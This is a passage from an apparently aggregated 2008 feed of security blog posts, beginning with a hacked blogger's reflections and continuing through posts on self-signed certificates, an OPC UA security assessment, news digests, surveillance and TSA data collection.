All of the above notwithstanding, it was not easy. Of course part of me would like to just be in a room with some of the people (and I use that term loosely) who committed this crime and take care of this, but that is probably not going to happen (one can hope though).  In some way I feel that in order to make steel, iron has to be put through the fire.  This event has resulted in steel being made. Where before I viewed security as a business that I was in, security from here on in will be a much more passionate endeavor for me.  In many ways this has made me truly a security person.  You will see a much deeper commitment by me in keeping the slime of the world from being successful.  I am going to do everything I can to make myself, my family and all of us more secure.  Security for me has gone from a business to a way of life.

I am also extremely humbled and grateful for all of the help that so many of you have rendered over this week. I never truly felt part of the security "community" until this week. Over the coming days I am going to talk about what you should do if this happens to you.  However, having friends and support in the industry is something that most of us just don't have.  The security community has reached out and picked me up by the bootstraps, performing incredible acts of kindness and generosity in recovering from this. I realize now that in my years in this industry I have made some great friendships. On top of this, the people I have made friends with are just incredible people! I will detail some of these acts and people in days and weeks to come.  For now though know that I will never forget and will do my best to be worthy of your kindness and help. I think some of the other security bloggers in the community are going to speak out on this as well. I will be interested in what they have to say.

In case any of you are wondering, I will not stop blogging and speaking out.  I would never let the likes of these people silence or intimidate me.  In truth the fact that they targeted me tells me that I must have struck a nerve or done some good work, that they would feel it necessary to attack me. In looking at the list of some of the names targeted along with me, I was almost honored to be included in such a prestigious group. I recognize that my blog and StillSecure are pretty well known and I guess that this shows that I am a target.  For now my blog will remain sparse.  As I continue to build it back up, I want to make sure that everything that is going in is clean of any malicious code.

Stay tuned for more to come and thanks for sticking with me!

Upping the stakes for insane spam titles.... [ - A Revolution is the Solution]

Posted: 14 Aug 2008 11:56 AM CDT


Certifiably Silly [Emergent Chaos]

Posted: 14 Aug 2008 11:21 AM CDT

Over at "The Security Practice," Michael Barrett writes about "Firefox 3.0 and self-signed certificates." Neither he nor I am representing our respective employers.
...almost everyone who wants to communicate securely using a browser can afford an SSL certificate from CAs such as GoDaddy, Thawte, etc. The cost of single certificates from these sources can only be described as nominal.
There are all sorts of use cases where $29 is not chump change. For example, I own about 8 domains, that's $240 in "security taxes." People in the third world would like to communicate securely. But most importantly, the idea assumes that it's ok to have an infrastructure which is mostly unencrypted, and we may trust encryption only after the certificate priests bless it. When I wrote about turning on "opportunistic encryption for PostFix," my goal was encrypting all email. There's no need for a CA. The threat model is passive adversaries, and there are lots of those.
My company is a major target of phishing, and as such we’ve spent quite a bit of time researching what anti-phishing approaches work. We published a whitepaper on this topic (which can be found on the company blog at ), which explains this in detail. However, a couple of relevant conclusions are that: 1) the vast majority of users simply want to be protected, 2) there’s no single “silver bullet”, and 3) that what we describe as “safer browsers” such as IE 7, and Firefox 3.0 are a significant part of the solution based on their improvements in user visible security indicators and secure-by-default behaviors.
You can't always get what you want. Really, most people have little understanding of the issues. I think this is in large part because we've been talking down to them, in some part because the issues are complex, and in some part because it's not important enough for them to want to become educated. It's especially not important enough in light of debates like this one. We should try (sometime) to give people what they need.

I think we'd agree that the vast majority of users want, need and deserve protection that's as simple and effective as we can make it. I don't think blocking self-signed certs is a large part of that goal.

I conflated two or three separate ideas in that last sentence, and I should explain them. The general logic is that most users should never be presented with a security dialog that gives them a choice – if they are, there’s typically at least a 50:50 chance that the wrong decision will be made. Instead, the browser should make the decision for them. However, in the case of self-signed certificates it’s almost impossible to see how any technology can disambiguate between legitimate uses and criminal ones.

When viewed through this lens, the changes to the Firefox user experience for self-signed certificates make perfect sense.

Even viewed through the lens presented, the self-signed experience doesn't make perfect sense, unless you start with the assumption that a $29 SSL cert has some useful security value. I don't believe it does. What it does is get rid of the 'self-signed' warnings. There are cheaper and easier ways to do that. Most of the certificates out there are signed by a company that the relying consumers have never heard of. There's just not that much verification that can be done for $29. Today, anyone who's broken into a company's mail server can buy a fake cert with a stolen credit card.

Now, Michael's employer is under massive attack. I am sympathetic to their desire to improve things, and I applaud a lot of things that they do. For example, their use of one time password tokens is great. I also think there's great value to pushing people to recent browsers.

At the same time, it's sensible for them to want to shift risk, and part of me even welcomes the risks and attacks hitting the CAs. But I think that imposing yet another security tax, based on a static analysis of attackers, and some certificate authority pixie dust isn't going to help things for very long.

And given the very real costs and the very fuzzy benefits, I think that breaking self-signed certificates is the wrong approach. What's the right approach? I wrote "Preserving the Internet Channel Against Phishers" three years ago. I think that the advice isn't silly at all.

Which Iceberg's Bigger? [ImperViews]

Posted: 14 Aug 2008 11:20 AM CDT

When I was writing the tip of the iceberg post I was excited from the thought that the overall damage of the data loss problem is much higher than reported. According to the Wall Street Journal, The Federal Trade Commission estimates nearly $50 billion is lost annually as a result of identity theft and credit-card fraud, with part of it absorbed by banks. In other words, not only are the numbers probably much higher than reported and therefore estimated by the FTC, it also seems like the bigger data loss events are a direct result of one of the following causes:

  1. An application and / or database hack.
  2. Some sort of a separation of duties violation.
  3. All of the above.

SecureSphere covers all those use cases. In other words, the portion of the problem that can be addressed by SecureSphere is very big. Huge.

OPC UA Assessment Series: Part 1 [Digital Bond]

Posted: 14 Aug 2008 08:56 AM CDT

Digital Bond has just completed a security assessment report on the OPC Unified Architecture [UA] protocol, and we will be issuing a series of blog posts supported with SCADApedia content on the results.

The assessment included both a paper security review of the multi-part OPC UA specification and an application assessment of the OPC Foundation’s Software Development Kit [SDK]. The SDK consists of a communication stack that vendors can build OPC UA applications on top of as well as sample client and server applications. The OPC UA security controls are in the communication stack. You can think of this as an assessment of a library with the sample client and server exercising the library.

This is an ideal time to review OPC UA security. The specifications are complete enough to support a review, and the SDK that many vendors will use to develop OPC UA client and server applications is out in beta, and OPC UA is not yet used in production systems. So by identifying and correcting vulnerabilities now, we can prevent them from getting deployed and avoid the reluctance and difficulty in making changes in operational systems.

The tentative organization of this series is:

  • Part 1: Intro
  • Part 2: Positive Findings
  • Part 3: Specification Vulnerabilities
  • Part 4: SDK Vulnerabilities
  • Part 5: OPC UA Vendor Implementation Vulnerabilities
  • Part 6: Asset Owner Tip Sheet to Analyzing The Security of Competitive OPC UA Servers
  • Part 7: Specification and SDK Improvements

One last point that is important to highlight in this introduction is the OPC Foundation’s interest in security. The OPC Foundation took an attitude that is still all too rare. They were eager and supportive of this assessment. In addition to the specification and SDK that any member can get, the OPC Foundation also provided the source code. In return, Digital Bond provided the OPC Foundation the full assessment report including findings and recommendations.

In discussions throughout the assessment it was very clear the OPC Foundation wanted to identify any security problems, and they wanted to fix them. In fact, you will note that Part 7 will list how the OPC Foundation has addressed and corrected the majority of the findings. We are aware a lot of this is already done or in process, but we will hold off on Part 7 until the revised specification and SDK are available.

Security Briefing: August 14th [Liquidmatrix Security Digest]

Posted: 14 Aug 2008 07:28 AM CDT


Yesterday was a whirlwind but, at the very least I was productive. Tried my “loud music while working” trick again. Worked like a champ.


And now, the news…

  1. Bumper Patch Tuesday plugs multiple Office flaws | The Register
  2. Pentagon puts hold on USAF cyber effort | The AP
  3. Security Flap Slams Wells Fargo Over Data Breach | Internet News
  4. TSA Clears Clear Program Operator | BTN
  5. Petty officers charged in computer hacking | Globe and Mail
  6. Google tries its hand at cryptography | vnunet
  7. Extradition of UFO hacking accused delayed by fortnight | The Herald
  8. The Best of 2600 Details the Milestones of Hacking | Wired
  9. Government Security of Information Still Needs Work | CFP


You Decide! [ - A Revolution is the Solution]

Posted: 14 Aug 2008 05:28 AM CDT

Is this:

1) A brilliant defence of

2) A scathing attack on

3) Something that was, in fact, posted by The Batman of Zur-En-Arrh while out of his mind on PCP.

Because I honestly have no idea.

New NoVA Infosec Calendar Feature & ShareThis Capability []

Posted: 14 Aug 2008 02:06 AM CDT

In an effort to help everyone plan a little bit more in advance, we’ve added a calendar for events that take place in or around NoVA. Currently, we’re just beta testing it to see how it works out. Please feel free to let us know what you think in the comments for this post. Also, use our Contact Us page to submit events that you would like added to the calendar. I’m hoping that in the future we can set something up so anyone can add events (with a little moderation of course :) ). Any suggestions would be appreciated. You may have also noticed that we added a ShareThis capability in our posts and pages. Hopefully, this feature will make it easier for you to pass along any nuggets to other infosec professionals. Enjoy!

Unfair Advantage [ImperViews]

Posted: 14 Aug 2008 12:06 AM CDT

Everyone (read: me) is looking for an unfair advantage. The cloak of invisibility that allows you to see and not be seen or makes your product sell like there's nothing else.

If you were watching the Summer Olympics swimming contest, you could have understood how technology can be translated into unfair advantage, in its positive meaning. The number of new world records is skyrocketing. In fact, it looks like we have a new world record for the number of world records....

Taste some of the debate at the Sport Scientists, and here the other experts are claiming that it's harmful. The unfair advantage is not just a result of the new suit technology (priced at $550 versus the regular $25 swimsuit). It's also the result of differently designed swimming pools (deeper, wider), more lanes, better springboards etc. Assuming that everything's legal (no drugs, the stopwatches are working perfectly etc.) the Chinese have managed to create the technology advantage that changes the rules of the game for everyone, while Speedo provides the unfair advantage to anyone that wears their suit.

Twitter Updates for 2008-08-13 [.:Computer Defense:.]

Posted: 13 Aug 2008 10:59 PM CDT

  • <-- latest blog post
  • @gattaca coffee would be nice... there's something about being up all night that can be tiring.
  • @gattaca Not really youth... more Microsoft Tuesday :)
  • @gattaca hopefully soon...
  • A few hours sleep and you feel much better.

Powered by Twitter Tools.

I Should Have Seen This Coming []

Posted: 13 Aug 2008 10:56 PM CDT

It all started about 11:15 today.  As I got out of my chair to leave to go pick up a sick kid I noticed El Sidekick had some road rash on his chin.  His reluctance to explain what happened kicked my imagination into overdrive to a point that I don’t want to know what happened because it will just be disappointing compared to what my brain came up with.  I worked from home this afternoon preparing to support El Sidekick upgrading our two LANsight Security Management Appliances to the latest 5.1 code.  I downloaded and read the documentation (a rarity for me) to get myself prepared.  The upgrade was supposed to happen at 6:30 PM tonight.  “Supposed to” being the key words there.  Late this afternoon I got the configs backed up just in case things went south during the upgrade.  We’re all set.  6:30 comes and goes.  6:45 comes and goes.  7:00 comes and goes.  At 7:07 I email El Sidekick a message that said “sure are using the word ‘about’ loosely” in reference to an “about 6:30” start time.  Finally at 7:19 I get a reply.  Being nearly an hour behind now should have been another clue as to how the night would end.  We had to make some networking changes in order to accommodate the new hardware, being installed tomorrow, so once that was complete we were ready for the upgrade.  First attempt revealed a web server issue that we had to work through.  Once we got that behind us we were cleared for take off.  Unfortunately the plane never even left the gate.  When initiating the upgrade we got an error so vague that only one thing came to mind.

Michael Bolton

We did the standard operating procedure to try to get around it.  Rebooted the server, downloaded the upgrade image again, etc, etc all with no luck.

Why should I change my name?  He’s the one that sucks.  - Michael Bolton in Office Space

This posting includes an audio/video/photo media file: Download Now

Outrage At NY Police Tracking Plan [Liquidmatrix Security Digest]

Posted: 13 Aug 2008 08:21 PM CDT

The NYPD has set off the community with a proposed plan to track vehicles with the use of a mesh of cameras. The entire idea is to drop a surveillance web across Manhattan. All of this under the guise of avoiding another terrorist attack. The ultimate “go to” excuse to strip away rights and spend money on blinking lights.

From The Guardian:

As well as placing cameras at all tunnels and bridges into Manhattan, the 36-page plan, called Operation Sentinel, calls for a security ring to be erected at Ground Zero and for a 50-mile buffer zone around the city within which mobile units would search for nuclear or “dirty” bombs.

The proposals are partly based on the so-called ring of steel erected around the City of London in the wake of IRA bombings in the 1990s. Though the 3,000 cameras that could be mounted as a result of the plans of the New York police pale in comparison with the multitude of cameras in operation on the UK’s roads and in public places, the proposals have provoked outrage in the United States, where the concept of video surveillance is relatively unfamiliar.

Folks in NYC might be pissed at this possibility. I would offer that this has been shown to be relatively ineffective in London where the “ring of steel” does little more than spot the occasional pan handler.

The New York “sentinel” video system will be set up to record license plates of all vehicles at every point into Manhattan. The data would be “kept on computer for a month”. Uh huh. If you are willing to swallow that nonsense I have some land in Florida I would be willing to sell ya.

For the full article read on.

Article Link

raWPacket HeX - Network Security Monitoring & Analysis LiveCD [Darknet - The Darkside]

Posted: 13 Aug 2008 04:01 PM CDT

HeX is a project aimed at the NSM (Network Security Monitoring) community for use by network security analysts. The developers believe that simplicity and analysis work flow logic must be enhanced and emphasized throughout the process of designing this liveCD. Not only have they carefully chosen all the necessary applications and tools to be...

Read the full post at

Applied Security Visualization Book is Available! [Raffy - Security Data Visualization]

Posted: 13 Aug 2008 03:38 PM CDT

The Applied Security Visualization book is DONE and available in your favorite store!

Last Tuesday when I arrived at BlackHat, I walked straight up to the book store. And there it was! I held it in my hands for the first time. I have to say, it was a really emotional moment. Seeing the product of 1.5 years of work was just amazing. I am really happy with how the book turned out. The color insert in the middle is a real eye-catcher for people flipping through the book and it greatly helps make some of the graphs easier to interpret.

I had a few copies to give away during BlackHat and DefCon. I am glad I was able to give copies to some people that have contributed by inspiring me, challenging me, or even giving me very specific use-cases that I collected in the book. Thanks everyone again! I really appreciate all your help.

People keep asking me what the next project is now that the book is out. Well, I am still busy. is one of my projects. I am trying to get more people involved in the discussions and get more people to contribute graphs. Another project I am starting is to build out a training around the book, which I want to teach at security conferences. I have a few leads already for that. Drop me a note if you would be interested in taking such a training. Maybe I will also get some time to work on AfterGlow some more. I have a lot of ideas on that end…

During DefCon, I recorded a PodCast with Martin McKeay where I talk a little bit about the book.

This posting includes an audio/video/photo media file: Download Now

USPTO To Revisit Dell’s ‘Cloud Computing’ Claim [Liquidmatrix Security Digest]

Posted: 13 Aug 2008 02:29 PM CDT

Catching up on my reading. I missed this article last week as I was focused on BH/Defcon. There’s some good news from the US Patent office for a change.

From IT World:

The U.S. Patent and Trademark Office (USPTO) has done an about face on Dell Inc.’s effort to claim a trademark on “cloud computing,” and is reconsidering its earlier action.

Dell had received near final approval for this trademark, but the USPTO canceled its “Notice of Allowance” on Tuesday, according to trademark records. The application has been “returned to examination.”

Dell spokesman David Frink said the company isn’t commenting on the USPTO’s action, other than to acknowledge that the issue is going back to the examiner for additional review. He didn’t want to speculate on what that might mean.

Read on for the full article.

Article Link

TSA Puts Fliers Without ID On A List [Liquidmatrix Security Digest]

Posted: 13 Aug 2008 02:24 PM CDT

So, if it wasn’t bad enough that there are 1 million plus folks on the “do not fly” list it appears that there is another list in the USA. The TSA (my buds) have managed to take the names of people who fly within the US without ID, which is legal, and compile a list. So, where have these names ended up? Funny you ask. They’ve been added to a database of folks who have violated security laws or have been questioned due to their behaviour.


From USA Today:

The TSA began storing the information in late June, tracking many people who said they had forgotten their driver’s license or passport at home. The database has 16,500 records of such people and is open to law enforcement agencies, according to the TSA.

Asked about the program, TSA chief Kip Hawley told USA TODAY in an interview Tuesday that the information helps track potential terrorists who may be “probing the system” by trying to get through checkpoints at various airports.

OK, so let me get this straight: this info is to “help track potential terrorists”? Did anyone at the TSA miss the fact that it is perfectly legal for US citizens to travel without ID within the States? And the data will be stored in some cases for up to 15 years.

Don’t forget your wallet.

Article Link
